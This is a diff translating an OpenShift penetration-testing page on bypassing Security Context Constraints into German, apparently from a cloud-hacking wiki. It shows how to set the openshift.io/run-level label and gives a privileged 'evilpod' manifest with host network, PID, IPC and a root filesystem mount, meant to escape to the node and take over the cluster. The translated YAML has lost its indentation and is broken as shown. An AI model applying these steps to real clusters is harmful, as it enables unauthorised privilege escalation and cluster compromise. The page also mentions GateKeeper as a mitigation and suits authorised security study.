Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md

@@ -1,10 +1,10 @@
 # Openshift - SCC bypass
 
-**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+**Der ursprüngliche Autor dieser Seite ist** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
-## Privileged Namespaces
+## Privilegierte Namespaces
 
-By default, SCC does not apply on following projects :
+Standardmäßig wird SCC nicht auf folgenden Projekten angewendet:
 
 - **default**
 - **kube-system**
@@ -13,130 +13,114 @@ By default, SCC does not apply on following projects :
 - **openshift-infra**
 - **openshift**
 
-If you deploy pods within one of those namespaces, no SCC will be enforced, allowing for the deployment of privileged pods or mounting of the host file system.
+Wenn Sie Pods in einem dieser Namespaces bereitstellen, wird keine SCC durchgesetzt, was die Bereitstellung von privilegierten Pods oder das Einbinden des Host-Dateisystems ermöglicht.
 
-## Namespace Label
+## Namespace-Label
 
-There is a way to disable the SCC application on your pod according to RedHat documentation. You will need to have at least one of the following permission :
-
-- Create a Namespace and Create a Pod on this Namespace
-- Edit a Namespace and Create a Pod on this Namespace
+Es gibt eine Möglichkeit, die Anwendung von SCC auf Ihrem Pod gemäß der RedHat-Dokumentation zu deaktivieren. Sie müssen mindestens eine der folgenden Berechtigungen haben:
 
+- Erstellen eines Namespaces und Erstellen eines Pods in diesem Namespace
+- Bearbeiten eines Namespaces und Erstellen eines Pods in diesem Namespace
 ```bash
 $ oc auth can-i create namespaces
-  yes
+yes
 
 $ oc auth can-i patch namespaces
-  yes
+yes
 ```
-
-The specific label`openshift.io/run-level` enables users to circumvent SCCs for applications. As per RedHat documentation, when this label is utilized, no SCCs are enforced on all pods within that namespace, effectively removing any restrictions.
+Der spezifische Label `openshift.io/run-level` ermöglicht es Benutzern, SCCs für Anwendungen zu umgehen. Laut der RedHat-Dokumentation werden bei Verwendung dieses Labels keine SCCs auf alle Pods innerhalb dieses Namensraums durchgesetzt, wodurch alle Einschränkungen effektiv aufgehoben werden.
 
 <figure><img src="../../../images/Openshift-RunLevel4.png" alt=""><figcaption></figcaption></figure>
 
-## Add Label
-
-To add the label in your namespace :
+## Label hinzufügen
 
+Um das Label in Ihrem Namensraum hinzuzufügen:
 ```bash
 $ oc label ns MYNAMESPACE openshift.io/run-level=0
 ```
-
-To create a namespace with the label through a YAML file:
-
+Um einen Namespace mit dem Label über eine YAML-Datei zu erstellen:
 ```yaml
 apiVersion: v1
 kind: Namespace
 metadata:
-  name: evil
-  labels:
-    openshift.io/run-level: 0
+name: evil
+labels:
+openshift.io/run-level: 0
 ```
-
-Now, all new pods created on the namespace should not have any SCC
+Jetzt sollten alle neuen Pods, die im Namespace erstellt werden, keine SCC haben.
 
 <pre class="language-bash"><code class="lang-bash"><strong>$ oc get pod -o yaml | grep 'openshift.io/scc'
-</strong><strong>$                                            
+</strong><strong>$
 </strong></code></pre>
 
-In the absence of SCC, there are no restrictions on your pod definition. This means that a malicious pod can be easily created to escape onto the host system.
-
+In Abwesenheit von SCC gibt es keine Einschränkungen für Ihre Pod-Definition. Das bedeutet, dass ein bösartiger Pod leicht erstellt werden kann, um auf das Host-System zu entkommen.
 ```yaml
 apiVersion: v1
 kind: Pod
 metadata:
-  name: evilpod
-  labels:
-    kubernetes.io/hostname: evilpod
+name: evilpod
+labels:
+kubernetes.io/hostname: evilpod
 spec:
-  hostNetwork: true #Bind pod network to the host network
-  hostPID: true #See host processes
-  hostIPC: true #Access host inter processes
-  containers:
-    - name: evil
-      image: MYIMAGE
-      imagePullPolicy: IfNotPresent
-      securityContext:
-        privileged: true
-        allowPrivilegeEscalation: true
-      resources:
-        limits:
-          memory: 200Mi
-        requests:
-          cpu: 30m
-          memory: 100Mi
-      volumeMounts:
-        - name: hostrootfs
-          mountPath: /mnt
-  volumes:
-    - name: hostrootfs
-      hostPath:
-        path:
+hostNetwork: true #Bind pod network to the host network
+hostPID: true #See host processes
+hostIPC: true #Access host inter processes
+containers:
+- name: evil
+image: MYIMAGE
+imagePullPolicy: IfNotPresent
+securityContext:
+privileged: true
+allowPrivilegeEscalation: true
+resources:
+limits:
+memory: 200Mi
+requests:
+cpu: 30m
+memory: 100Mi
+volumeMounts:
+- name: hostrootfs
+mountPath: /mnt
+volumes:
+- name: hostrootfs
+hostPath:
+path:
 ```
-
-Now, it has become easier to escalate privileges to access the host system and subsequently take over the entire cluster, gaining 'cluster-admin' privileges. Look for **Node-Post Exploitation** part in the following page :
+Jetzt ist es einfacher geworden, Privilegien zu eskalieren, um auf das Hostsystem zuzugreifen und anschließend den gesamten Cluster zu übernehmen, wodurch 'cluster-admin' Privilegien erlangt werden. Suchen Sie nach dem Abschnitt **Node-Post Exploitation** auf der folgenden Seite:
 
 {{#ref}}
 ../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
 {{#endref}}
 
-### Custom labels
+### Benutzerdefinierte Labels
 
-Furthermore, based on the target setup, some custom labels / annotations may be used in the same way as the previous attack scenario. Even if it is not made for, labels could be used to give permissions, restrict or not a specific resource.
+Darüber hinaus können je nach Zielkonfiguration einige benutzerdefinierte Labels / Annotationen auf die gleiche Weise wie im vorherigen Angriffszenario verwendet werden. Auch wenn sie nicht dafür vorgesehen sind, könnten Labels verwendet werden, um Berechtigungen zu erteilen, eine bestimmte Ressource einzuschränken oder nicht.
 
-Try to look for custom labels if you can read some resources. Here a list of interesting resources :
+Versuchen Sie, nach benutzerdefinierten Labels zu suchen, wenn Sie einige Ressourcen lesen können. Hier ist eine Liste interessanter Ressourcen:
 
 - Pod
 - Deployment
 - Namespace
 - Service
 - Route
-
 ```bash
 $ oc get pod -o yaml | grep labels -A 5
 $ oc get namespace -o yaml | grep labels -A 5
 ```
-
-## List all privileged namespaces
-
+## Liste aller privilegierten Namespaces
 ```bash
 $ oc get project -o yaml | grep 'run-level' -b5
 ```
+## Fortgeschrittener Exploit
 
-## Advanced exploit
+In OpenShift, wie zuvor demonstriert, kann das Berechtigung, ein Pod in einem Namespace mit dem `openshift.io/run-level`-Label zu deployen, zu einer unkomplizierten Übernahme des Clusters führen. Aus der Perspektive der Cluster-Einstellungen **kann diese Funktionalität nicht deaktiviert werden**, da sie im Design von OpenShift verankert ist.
 
-In OpenShift, as demonstrated earlier, having permission to deploy a pod in a namespace with the `openshift.io/run-level`label can lead to a straightforward takeover of the cluster. From a cluster settings perspective, this functionality **cannot be disabled**, as it is inherent to OpenShift's design.
+Allerdings können Maßnahmen wie **Open Policy Agent GateKeeper** verhindern, dass Benutzer dieses Label setzen.
 
-However, mitigation measures like **Open Policy Agent GateKeeper** can prevent users from setting this label.
+Um die Regeln von GateKeeper zu umgehen und dieses Label zu setzen, um eine Cluster-Übernahme durchzuführen, **müssten Angreifer alternative Methoden identifizieren.**
 
-To bypass GateKeeper's rules and set this label to execute a cluster takeover, **attackers would need to identify alternative methods.**
-
-## References
+## Referenzen
 
 - [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html)
 - [https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html)
 - [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-
-
-
-